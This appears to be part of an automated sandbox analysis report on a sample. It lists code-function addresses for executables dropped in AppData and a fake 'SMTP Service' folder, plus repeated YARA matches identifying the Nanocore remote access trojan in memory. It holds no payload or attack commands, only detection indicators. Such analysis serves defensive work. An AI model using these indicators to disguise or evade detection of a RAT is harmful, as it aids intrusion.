Source: C:\Users\user\AppData\Roaming\cat464923.exe Code function: 4_2_002E9440 4_2_002E9440
Source: C:\Users\user\AppData\Roaming\cat464923.exe Code function: 4_2_002E8059 4_2_002E8059
Source: C:\Users\user\AppData\Roaming\cat464923.exe Code function: 4_2_002EB8A8 4_2_002EB8A8
Source: C:\Users\user\AppData\Roaming\cat464923.exe Code function: 4_2_002EB8B8 4_2_002EB8B8
Source: C:\Users\user\AppData\Roaming\cat464923.exe Code function: 4_2_002E98B8 4_2_002E98B8
Source: C:\Users\user\AppData\Roaming\cat464923.exe Code function: 4_2_002EA8FA 4_2_002EA8FA
Source: C:\Users\user\AppData\Roaming\cat464923.exe Code function: 4_2_002EBD27 4_2_002EBD27
Source: C:\Users\user\AppData\Roaming\cat464923.exe Code function: 4_2_002EA920 4_2_002EA920
Source: C:\Users\user\AppData\Roaming\cat464923.exe Code function: 4_2_002E0500 4_2_002E0500
Source: C:\Users\user\AppData\Roaming\cat464923.exe Code function: 4_2_002E4168 4_2_002E4168
Source: C:\Users\user\AppData\Roaming\cat464923.exe Code function: 4_2_002EA970 4_2_002EA970
Source: C:\Users\user\AppData\Roaming\cat464923.exe Code function: 4_2_002E5D80 4_2_002E5D80
Source: C:\Users\user\AppData\Roaming\cat464923.exe Code function: 4_2_002E9248 4_2_002E9248
Source: C:\Users\user\AppData\Roaming\cat464923.exe Code function: 4_2_002E9250 4_2_002E9250
Source: C:\Users\user\AppData\Roaming\cat464923.exe Code function: 4_2_002EC6B6 4_2_002EC6B6
Source: C:\Users\user\AppData\Roaming\cat464923.exe Code function: 4_2_002EC6E8 4_2_002EC6E8
Source: C:\Users\user\AppData\Roaming\cat464923.exe Code function: 4_2_002EDEF4 4_2_002EDEF4
Source: C:\Users\user\AppData\Roaming\cat464923.exe Code function: 4_2_002E96C1 4_2_002E96C1
Source: C:\Users\user\AppData\Roaming\cat464923.exe Code function: 4_2_002E8ED8 4_2_002E8ED8
Source: C:\Users\user\AppData\Roaming\cat464923.exe Code function: 4_2_002E96D0 4_2_002E96D0
Source: C:\Users\user\AppData\Roaming\cat464923.exe Code function: 4_2_002EAFA8 4_2_002EAFA8
Source: C:\Users\user\AppData\Roaming\cat464923.exe Code function: 4_2_002ED79C 4_2_002ED79C
Source: C:\Users\user\AppData\Roaming\cat464923.exe Code function: 4_2_002E8BE0 4_2_002E8BE0
Source: C:\Users\user\AppData\Roaming\cat464923.exe Code function: 4_2_002E8BD0 4_2_002E8BD0
Source: C:\Users\user\AppData\Roaming\cat464923.exe Code function: 5_2_002DE058 5_2_002DE058
Source: C:\Users\user\AppData\Roaming\cat464923.exe Code function: 5_2_002DC0C8 5_2_002DC0C8
Source: C:\Users\user\AppData\Roaming\cat464923.exe Code function: 5_2_002D43A0 5_2_002D43A0
Source: C:\Users\user\AppData\Roaming\cat464923.exe Code function: 5_2_002DB4B0 5_2_002DB4B0
Source: C:\Users\user\AppData\Roaming\cat464923.exe Code function: 5_2_002D3788 5_2_002D3788
Source: C:\Users\user\AppData\Roaming\cat464923.exe Code function: 5_2_002DC186 5_2_002DC186
Source: C:\Users\user\AppData\Roaming\cat464923.exe Code function: 5_2_002D4458 5_2_002D4458
Source: C:\Users\user\AppData\Roaming\cat464923.exe Code function: 11_2_002EDC2A 11_2_002EDC2A
Source: C:\Users\user\AppData\Roaming\cat464923.exe Code function: 11_2_002E0098 11_2_002E0098
Source: C:\Users\user\AppData\Roaming\cat464923.exe Code function: 11_2_002E5920 11_2_002E5920
Source: C:\Users\user\AppData\Roaming\cat464923.exe Code function: 11_2_002EBD38 11_2_002EBD38
Source: C:\Users\user\AppData\Roaming\cat464923.exe Code function: 11_2_002E4D08 11_2_002E4D08
Source: C:\Users\user\AppData\Roaming\cat464923.exe Code function: 11_2_002E157F 11_2_002E157F
Source: C:\Users\user\AppData\Roaming\cat464923.exe Code function: 11_2_002E3D8F 11_2_002E3D8F
Source: C:\Users\user\AppData\Roaming\cat464923.exe Code function: 11_2_002E71C0 11_2_002E71C0
Source: C:\Users\user\AppData\Roaming\cat464923.exe Code function: 11_2_002E2670 11_2_002E2670
Source: C:\Users\user\AppData\Roaming\cat464923.exe Code function: 11_2_002E36C8 11_2_002E36C8
Source: C:\Users\user\AppData\Roaming\cat464923.exe Code function: 11_2_002EDF00 11_2_002EDF00
Source: C:\Users\user\AppData\Roaming\cat464923.exe Code function: 11_2_002E6300 11_2_002E6300
Source: C:\Users\user\AppData\Roaming\cat464923.exe Code function: 11_2_002E9430 11_2_002E9430
Source: C:\Users\user\AppData\Roaming\cat464923.exe Code function: 11_2_002E8068 11_2_002E8068
Source: C:\Users\user\AppData\Roaming\cat464923.exe Code function: 11_2_002E9440 11_2_002E9440
Source: C:\Users\user\AppData\Roaming\cat464923.exe Code function: 11_2_002E8059 11_2_002E8059
Source: C:\Users\user\AppData\Roaming\cat464923.exe Code function: 11_2_002EB8A8 11_2_002EB8A8
Source: C:\Users\user\AppData\Roaming\cat464923.exe Code function: 11_2_002EB8B8 11_2_002EB8B8
Source: C:\Users\user\AppData\Roaming\cat464923.exe Code function: 11_2_002E98B8 11_2_002E98B8
Source: C:\Users\user\AppData\Roaming\cat464923.exe Code function: 11_2_002E0498 11_2_002E0498
Source: C:\Users\user\AppData\Roaming\cat464923.exe Code function: 11_2_002EA8FA 11_2_002EA8FA
Source: C:\Users\user\AppData\Roaming\cat464923.exe Code function: 11_2_002EBD27 11_2_002EBD27
Source: C:\Users\user\AppData\Roaming\cat464923.exe Code function: 11_2_002EA920 11_2_002EA920
Source: C:\Users\user\AppData\Roaming\cat464923.exe Code function: 11_2_002E0501 11_2_002E0501
Source: C:\Users\user\AppData\Roaming\cat464923.exe Code function: 11_2_002E4168 11_2_002E4168
Source: C:\Users\user\AppData\Roaming\cat464923.exe Code function: 11_2_002EA970 11_2_002EA970
Source: C:\Users\user\AppData\Roaming\cat464923.exe Code function: 11_2_002E5D80 11_2_002E5D80
Source: C:\Users\user\AppData\Roaming\cat464923.exe Code function: 11_2_002E266F 11_2_002E266F
Source: C:\Users\user\AppData\Roaming\cat464923.exe Code function: 11_2_002E9242 11_2_002E9242
Source: C:\Users\user\AppData\Roaming\cat464923.exe Code function: 11_2_002E9250 11_2_002E9250
Source: C:\Users\user\AppData\Roaming\cat464923.exe Code function: 11_2_002EC6B6 11_2_002EC6B6
Source: C:\Users\user\AppData\Roaming\cat464923.exe Code function: 11_2_002EC6E8 11_2_002EC6E8
Source: C:\Users\user\AppData\Roaming\cat464923.exe Code function: 11_2_002EDEF2
Source: C:\Users\user\AppData\Roaming\cat464923.exe Code function: 11_2_002E96C1
Source: C:\Users\user\AppData\Roaming\cat464923.exe Code function: 11_2_002E8ED2
Source: C:\Users\user\AppData\Roaming\cat464923.exe Code function: 11_2_002E96D0
Source: C:\Users\user\AppData\Roaming\cat464923.exe Code function: 11_2_002E8BE0
Source: C:\Users\user\AppData\Roaming\cat464923.exe Code function: 11_2_002E8BD0
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe Code function: 12_2_0059DC28
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe Code function: 12_2_00590098
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe Code function: 12_2_00591553
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe Code function: 12_2_00594D08
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe Code function: 12_2_0059BD38
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe Code function: 12_2_00595920
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe Code function: 12_2_005971C0
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe Code function: 12_2_00593D8E
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe Code function: 12_2_00592670
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe Code function: 12_2_005936C8
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe Code function: 12_2_0059DF00
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe Code function: 12_2_00596300
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe Code function: 12_2_00598059
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe Code function: 12_2_00599440
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe Code function: 12_2_00598068
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe Code function: 12_2_00599430
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe Code function: 12_2_005904F9
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe Code function: 12_2_0059A8FA
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe Code function: 12_2_0059B8B8
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe Code function: 12_2_005998B8
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe Code function: 12_2_0059B8A8
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe Code function: 12_2_0059A970
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe Code function: 12_2_00594168
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe Code function: 12_2_0059A920
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe Code function: 12_2_0059BD27
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe Code function: 12_2_00595D80
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe Code function: 12_2_00599250
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe Code function: 12_2_00599242
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe Code function: 12_2_00592660
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe Code function: 12_2_005996D0
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe Code function: 12_2_00598ED2
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe Code function: 12_2_0059C6CC
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe Code function: 12_2_005996C1
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe Code function: 12_2_0059DEF2
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe Code function: 12_2_0059C6E8
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe Code function: 12_2_005936B8
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe Code function: 12_2_00598BD0
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe Code function: 12_2_00598BE0
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe Code function: 13_2_002BDC28
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe Code function: 13_2_002B0098
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe Code function: 13_2_002B5920
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe Code function: 13_2_002BBD38
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe Code function: 13_2_002B4D08
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe Code function: 13_2_002B1553
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe Code function: 13_2_002B3D81
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe Code function: 13_2_002B71C0
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe Code function: 13_2_002B2670
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe Code function: 13_2_002B36C8
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe Code function: 13_2_002BDF00
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe Code function: 13_2_002B6300
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe Code function: 13_2_002B9430
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe Code function: 13_2_002B8068
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe Code function: 13_2_002B9440
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe Code function: 13_2_002B8059
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe Code function: 13_2_002BB8A8
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe Code function: 13_2_002BB8B8
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe Code function: 13_2_002B98B8
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe Code function: 13_2_002B04FA
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe Code function: 13_2_002BA8FA
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe Code function: 13_2_002BA923
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe Code function: 13_2_002BBD27
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe Code function: 13_2_002B4168
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe Code function: 13_2_002BA970
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe Code function: 13_2_002B5D80
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe Code function: 13_2_002B9242
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe Code function: 13_2_002B9250
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe Code function: 13_2_002BC6A6
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe Code function: 13_2_002BC6E8
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe Code function: 13_2_002BDEF2
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe Code function: 13_2_002B96C1
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe Code function: 13_2_002B8ED2
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe Code function: 13_2_002B96D0
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe Code function: 13_2_002B8BE0
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe Code function: 13_2_002B8BD0
Source: C:\Users\user\AppData\Roaming\cat464923.exe Code function: 16_2_002D43A0
Source: C:\Users\user\AppData\Roaming\cat464923.exe Code function: 16_2_002D3788
Source: C:\Users\user\AppData\Roaming\cat464923.exe Code function: 16_2_002D4458
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe Code function: 17_2_003246C9
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe Code function: 17_2_003243A0
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe Code function: 17_2_00323788
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe Code function: 17_2_00324C78
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe Code function: 17_2_00324458
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe Code function: 18_2_003943A0
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe Code function: 18_2_00393788
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe Code function: 18_2_00394C78
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe Code function: 18_2_00394458
Yara signature match
Source: 00000010.00000000.2148512830.0000000000402000.00000040.00000001.sdmp, type: MEMORY Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 00000010.00000000.2148512830.0000000000402000.00000040.00000001.sdmp, type: MEMORY Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 00000005.00000002.2347454023.0000000000440000.00000004.00000001.sdmp, type: MEMORY Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 00000005.00000002.2347454023.0000000000440000.00000004.00000001.sdmp, type: MEMORY Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 00000012.00000002.2220223642.0000000003359000.00000004.00000001.sdmp, type: MEMORY Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 00000012.00000002.2218871109.0000000000402000.00000040.00000001.sdmp, type: MEMORY Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 00000012.00000002.2218871109.0000000000402000.00000040.00000001.sdmp, type: MEMORY Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 00000005.00000000.2088911305.0000000000402000.00000040.00000001.sdmp, type: MEMORY Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 00000005.00000000.2088911305.0000000000402000.00000040.00000001.sdmp, type: MEMORY Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 00000011.00000002.2221684497.0000000003309000.00000004.00000001.sdmp, type: MEMORY Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 00000005.00000002.2347482313.00000000004A0000.00000004.00000001.sdmp, type: MEMORY Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 00000005.00000002.2347482313.00000000004A0000.00000004.00000001.sdmp, type: MEMORY Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 00000004.00000002.2091457817.0000000003585000.00000004.00000001.sdmp, type: MEMORY Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 00000004.00000002.2091457817.0000000003585000.00000004.00000001.sdmp, type: MEMORY Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 00000011.00000000.2184659312.0000000000402000.00000040.00000001.sdmp, type: MEMORY Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 00000011.00000000.2184659312.0000000000402000.00000040.00000001.sdmp, type: MEMORY Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 00000011.00000002.2220476189.0000000000402000.00000040.00000001.sdmp, type: MEMORY Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 00000011.00000002.2220476189.0000000000402000.00000040.00000001.sdmp, type: MEMORY Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 00000005.00000002.2351063180.00000000034D9000.00000004.00000001.sdmp, type: MEMORY Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 0000000D.00000002.2212946414.0000000003525000.00000004.00000001.sdmp, type: MEMORY Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 0000000D.00000002.2212946414.0000000003525000.00000004.00000001.sdmp, type: MEMORY Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 00000010.00000002.2217963570.0000000000402000.00000040.00000001.sdmp, type: MEMORY Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 00000010.00000002.2217963570.0000000000402000.00000040.00000001.sdmp, type: MEMORY Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 0000000B.00000002.2213146011.00000000033E5000.00000004.00000001.sdmp, type: MEMORY Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 0000000B.00000002.2213146011.00000000033E5000.00000004.00000001.sdmp, type: MEMORY Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 00000010.00000000.2147864826.0000000000402000.00000040.00000001.sdmp, type: MEMORY Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 00000010.00000000.2147864826.0000000000402000.00000040.00000001.sdmp, type: MEMORY Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 00000011.00000000.2148426464.0000000000402000.00000040.00000001.sdmp, type: MEMORY Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 00000011.00000000.2148426464.0000000000402000.00000040.00000001.sdmp, type: MEMORY Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 0000000D.00000002.2212398437.0000000003379000.00000004.00000001.sdmp, type: MEMORY Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 0000000D.00000002.2212398437.0000000003379000.00000004.00000001.sdmp, type: MEMORY Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 00000010.00000002.2220405288.0000000002281000.00000004.00000001.sdmp, type: MEMORY Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 00000004.00000002.2090874176.00000000033D9000.00000004.00000001.sdmp, type: MEMORY Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 00000004.00000002.2090874176.00000000033D9000.00000004.00000001.sdmp, type: MEMORY Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 00000010.00000002.2220469007.0000000003289000.00000004.00000001.sdmp, type: MEMORY Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 00000011.00000002.2221628087.0000000002301000.00000004.00000001.sdmp, type: MEMORY Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 00000012.00000002.2220153845.0000000002351000.00000004.00000001.sdmp, type: MEMORY Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 00000005.00000000.2088546622.0000000000402000.00000040.00000001.sdmp, type: MEMORY Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 00000005.00000000.2088546622.0000000000402000.00000040.00000001.sdmp, type: MEMORY Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 00000012.00000000.2168272542.0000000000402000.00000040.00000001.sdmp, type: MEMORY Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 00000012.00000000.2168272542.0000000000402000.00000040.00000001.sdmp, type: MEMORY Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 0000000C.00000002.2209068863.00000000030A9000.00000004.00000001.sdmp, type: MEMORY Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 0000000C.00000002.2209068863.00000000030A9000.00000004.00000001.sdmp, type: MEMORY Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 00000012.00000000.2169977777.0000000000402000.00000040.00000001.sdmp, type: MEMORY Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 00000012.00000000.2169977777.0000000000402000.00000040.00000001.sdmp, type: MEMORY Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
